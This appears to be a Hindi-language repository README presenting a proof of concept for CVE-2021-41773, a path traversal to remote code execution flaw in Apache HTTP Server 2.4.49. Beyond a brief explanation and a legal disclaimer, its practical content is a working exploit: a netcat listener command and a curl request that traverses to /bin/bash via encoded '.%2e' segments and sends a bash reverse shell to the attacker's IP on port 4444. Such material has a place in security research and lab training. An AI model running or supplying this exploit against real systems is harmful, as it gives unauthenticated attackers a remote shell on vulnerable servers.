
CVE-2021-41773 के लिए शैक्षिक प्रमाण-अवधारणा, जो Apache HTTP Server 2.4.49 पर रिवर्स शेल पेलोड के साथ पथ ट्रैवर्सल से रिमोट कोड निष्पादन तक प्रदर्शित करता है।
⚠️ अस्वीकरण
यह रिपॉजिटरी केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है।
यहां प्रदान की गई जानकारी और कोड का उपयोग नियंत्रित वातावरण में किया जा सकता है, जैसे निजी प्रयोगशाला मशीनें।
उन सिस्टमों के खिलाफ इस कोड का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है।
CVE-2021-41773 अपाचे HTTP सर्वर संस्करण 2.4.49 को प्रभावित करता है।
पथ सामान्यीकरण में अनुचित इनपुट सत्यापन के कारण, एक हमलावर %2e जैसे एन्कोडेड वर्णों का उपयोग करके पथ ट्रैवर्सल का शोषण करके मनमानी फाइलों तक पहुंच सकता है।
यदि CGI सक्षम है, तो इस कमजोरी को अप्रमाणित रिमोट कोड निष्पादन (RCE) तक बढ़ाया जा सकता है।
पथ ट्रैवर्सल दोष का शोषण करने के लिए एक दुर्भावनापूर्ण curl अनुरोध तैयार किया जाता है। जब CGI सक्षम होता है, तो हमलावर /bin/bash तक पहुंच सकते हैं और मनमानी शेल कमांड चला सकते हैं।
इस उदाहरण में, सर्वर से शेल एक्सेस प्राप्त करने के लिए एक रिवर्स शेल पेलोड भेजा जाता है।
यह शोषण एक निजी प्रयोगशाला वातावरण में परीक्षण किया गया था। नीचे चरण और परिणाम दिए गए हैं।
एक Nmap स्कैन ने Apache/2.4.49 चलाने वाले लक्ष्य की पहचान की।

एक क्राफ्टेड curl कमांड का उपयोग करके एक रिवर्स शेल पेलोड वितरित किया गया।

हमलावर के लिसनर पर सफलतापूर्वक एक रिवर्स शेल प्राप्त हुआ।

चरण 1: Netcat लिसनर प्रारंभ करें
nc -nvlp 4444
चरण 1: शोषण चलाएं
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
मेरे मीडियम पोस्ट पर विस्तृत वॉकथ्रू और सिद्धांत देखें:
👉 मीडियम पर ब्लॉग पढ़ें